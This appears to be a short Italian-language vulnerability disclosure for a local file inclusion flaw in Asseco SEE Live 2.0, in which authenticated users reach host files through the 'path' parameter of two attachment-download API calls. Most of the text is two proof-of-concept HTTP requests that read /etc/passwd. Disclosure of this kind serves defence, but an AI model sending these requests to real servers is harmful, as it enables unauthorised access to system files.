
La Local File Inclusion nei componenti Contact Plan, E-Mail, SMS e Fax in Asseco SEE Live 2.0 consente agli utenti autenticati da remoto di accedere ai file sull'host tramite il parametro "path" nelle chiamate API downloadAttachment e downloadAttachmentFromPath.
Inclusione di file locale nei componenti Contact Plan, E-Mail, SMS e Fax in Asseco SEE Live 2.0 consente agli utenti autenticati remoti di accedere ai file sull'host tramite il parametro "path" nelle chiamate API downloadAttachment e downloadAttachmentFromPath.
Le richieste HTTP richiedono un'autenticazione di basso livello.
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary--
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"
HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"
Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"
/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"
[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"
Template
------WebKitFormBoundary--